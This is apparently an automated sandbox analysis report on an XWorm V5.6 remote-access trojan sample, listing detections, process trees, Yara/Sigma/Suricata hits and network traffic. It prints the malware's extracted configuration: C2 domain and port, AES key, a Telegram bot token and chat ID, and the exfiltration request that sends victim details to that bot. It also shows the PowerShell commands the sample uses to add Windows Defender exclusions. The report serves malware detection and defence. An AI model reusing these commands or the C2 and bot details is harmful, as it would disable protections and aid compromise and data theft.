Windows Analysis Report
NzEsfIiAc0.exe

Overview

General Information

Sample name: NzEsfIiAc0.exe (renamed because original name is a hash value)
Original sample name: 0b80b6d2e6b7330c1f917dc01d612f6f314630edc8d05f3831689865990dcba5.exe
Analysis ID: 1512625
MD5: bfdf788a451cf345e09e7646734f4666
SHA1: 0729903458944361b593ee6ef120de0eca8913b3
SHA256: 0b80b6d2e6b7330c1f917dc01d612f6f314630edc8d05f3831689865990dcba5
Tags: 96-9-226-111exe

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • NzEsfIiAc0.exe (PID: 3576 cmdline: "C:\Users\user\Desktop\NzEsfIiAc0.exe" MD5: BFDF788A451CF345E09E7646734F4666)
    • powershell.exe (PID: 1280 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NzEsfIiAc0.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6920 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 url": ["paul-vocational.gl.at.ply.gg"], "Port": "56417", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6", "Telegram URL": "https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=6378619811"}
{"C2 url": "https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage"}
Source | Rule | Description | Author | Strings
NzEsfIiAc0.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
NzEsfIiAc0.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
NzEsfIiAc0.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | (strings below)
  • 0x87f3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8890:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x89a5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x84a1:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\XClient.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Roaming\XClient.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Roaming\XClient.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | (strings below)
  • 0x87f3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8890:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x89a5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x84a1:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | (strings below)
  • 0x85f3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8690:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x87a5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x82a1:$cnc4: POST / HTTP/1.1
Process Memory Space: NzEsfIiAc0.exe PID: 3576 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
Process Memory Space: NzEsfIiAc0.exe PID: 3576 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |

Source | Rule | Description | Author | Strings
0.0.NzEsfIiAc0.exe.260000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0.0.NzEsfIiAc0.exe.260000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
0.0.NzEsfIiAc0.exe.260000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | (strings below)
  • 0x87f3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8890:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x89a5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x84a1:$cnc4: POST / HTTP/1.1

                      System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NzEsfIiAc0.exe", ParentImage: C:\Users\user\Desktop\NzEsfIiAc0.exe, ParentProcessId: 3576, ParentProcessName: NzEsfIiAc0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', ProcessId: 1280, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NzEsfIiAc0.exe", ParentImage: C:\Users\user\Desktop\NzEsfIiAc0.exe, ParentProcessId: 3576, ParentProcessName: NzEsfIiAc0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', ProcessId: 1280, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NzEsfIiAc0.exe", ParentImage: C:\Users\user\Desktop\NzEsfIiAc0.exe, ParentProcessId: 3576, ParentProcessName: NzEsfIiAc0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', ProcessId: 1280, ProcessName: powershell.exe
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\NzEsfIiAc0.exe, ProcessId: 3576, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NzEsfIiAc0.exe", ParentImage: C:\Users\user\Desktop\NzEsfIiAc0.exe, ParentProcessId: 3576, ParentProcessName: NzEsfIiAc0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe', ProcessId: 1280, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-17T17:26:33.365190+0200 | 2853685 | 1 | A Network Trojan was detected | 192.168.2.6 | 49719 | 149.154.167.220 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-17T17:27:10.017016+0200 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49724 | 147.185.221.21 | 56417 | TCP

                      AV Detection

Source: NzEsfIiAc0.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\XClient.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: NzEsfIiAc0.exe | Malware Configuration Extractor: Xworm {"C2 url": ["paul-vocational.gl.at.ply.gg"], "Port": "56417", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6", "Telegram URL": "https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=6378619811"}
Source: NzEsfIiAc0.exe.3576.0.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage"}
Source: C:\Users\user\AppData\Roaming\XClient.exe | ReversingLabs: Detection: 81%
Source: NzEsfIiAc0.exe | ReversingLabs: Detection: 81%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\XClient.exe | Joe Sandbox ML: detected
Source: NzEsfIiAc0.exe | Joe Sandbox ML: detected
Source: NzEsfIiAc0.exe | String decryptor: paul-vocational.gl.at.ply.gg
Source: NzEsfIiAc0.exe | String decryptor: 56417
Source: NzEsfIiAc0.exe | String decryptor: <123456789>
Source: NzEsfIiAc0.exe | String decryptor: <Xwormmm>
Source: NzEsfIiAc0.exe | String decryptor: XWorm V5.6
Source: NzEsfIiAc0.exe | String decryptor: USB.exe
Source: NzEsfIiAc0.exe | String decryptor: %AppData%
Source: NzEsfIiAc0.exe | String decryptor: XClient.exe
Source: NzEsfIiAc0.exe | String decryptor: 7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA
Source: NzEsfIiAc0.exe | String decryptor: 6378619811
Source: NzEsfIiAc0.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: NzEsfIiAc0.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49724 -> 147.185.221.21:56417
Source: Network traffic | Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.6:49719 -> 149.154.167.220:443
Source: Malware configuration extractor | URLs: paul-vocational.gl.at.ply.gg
Source: global traffic | TCP traffic: 147.185.221.21 ports 1,4,5,6,7,56417
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: NzEsfIiAc0.exe, type: SAMPLE
Source: Yara match | File source: 0.0.NzEsfIiAc0.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.6:49721 -> 147.185.221.21:56417
Source: global traffic | HTTP traffic detected: GET /bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=6378619811&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF248E435BF45453C730E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20AFXDXR%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | IP Address: 147.185.221.21 147.185.221.21
Source: Joe Sandbox View | ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View | ASN Name: SALSGIVERUS SALSGIVERUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=6378619811&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF248E435BF45453C730E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20AFXDXR%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: paul-vocational.gl.at.ply.gg
Source: powershell.exe, 00000002.00000002.2242258397.000001535A9AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: powershell.exe, 00000005.00000002.2347323496.0000019224955000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2686027389.000002DDB9CAB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000005.00000002.2347323496.0000019224955000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2686027389.000002DDB9CAB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000002.00000002.2235529090.000001535232F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2330121656.000001921C08F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2470760532.000001A61006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2219535625.00000153424E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2269705206.000001920C24A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380787524.000001A600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: NzEsfIiAc0.exe, 00000000.00000002.3398807333.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2219535625.00000153422C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2269705206.000001920C021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380787524.000001A600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2539816405.000002DDA1691000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2219535625.00000153424E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2269705206.000001920C24A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380787524.000001A600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2242258397.000001535A9AE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2347323496.0000019224955000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000002.00000002.2219535625.00000153422C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2269705206.000001920C021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380787524.000001A600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2539816405.000002DDA1691000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: NzEsfIiAc0.exe, 00000000.00000002.3398807333.00000000025F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: NzEsfIiAc0.exe, XClient.exe.0.dr | String found in binary or memory: https://api.telegram.org/bot
Source: NzEsfIiAc0.exe, 00000000.00000002.3398807333.00000000025F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=63786
Source: powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000002.2690372644.000002DDB9EB8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://nt.C
Source: powershell.exe, 00000002.00000002.2235529090.000001535232F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2330121656.000001921C08F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2470760532.000001A61006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49719 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: NzEsfIiAc0.exe, XLogger.cs | .Net Code: KeyboardLayout
Source: XClient.exe.0.dr, XLogger.cs | .Net Code: KeyboardLayout

                      Operating System Destruction

Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Process information set: 01 00 00 00

                      System Summary

                      Source: NzEsfIiAc0.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.0.NzEsfIiAc0.exe.260000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeCode function: 0_2_00007FFD347770B60_2_00007FFD347770B6
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeCode function: 0_2_00007FFD347705B80_2_00007FFD347705B8
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeCode function: 0_2_00007FFD34777E620_2_00007FFD34777E62
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exeCode function: 0_2_00007FFD347739820_2_00007FFD34773982
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347A8E052_2_00007FFD347A8E05
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347A56EA2_2_00007FFD347A56EA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347A8F4A2_2_00007FFD347A8F4A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD347885035_2_00007FFD34788503
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34788EFA5_2_00007FFD34788EFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34789EFB5_2_00007FFD34789EFB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34785EFA5_2_00007FFD34785EFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3478ABF25_2_00007FFD3478ABF2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3478B8285_2_00007FFD3478B828
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34779EF310_2_00007FFD34779EF3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3477947D10_2_00007FFD3477947D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34778E2C10_2_00007FFD34778E2C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD347756EA10_2_00007FFD347756EA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3477AB1510_2_00007FFD3477AB15
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD347726D310_2_00007FFD347726D3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3477B7DC10_2_00007FFD3477B7DC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD34785CFA13_2_00007FFD34785CFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD3478608113_2_00007FFD34786081
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD3478B9FA13_2_00007FFD3478B9FA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FFD347889F2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FFD34788E05
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FFD34789F20
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FFD34785BF2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FFD3478B81C
                      Source: NzEsfIiAc0.exe, 00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameXClient.exe4 vs NzEsfIiAc0.exe
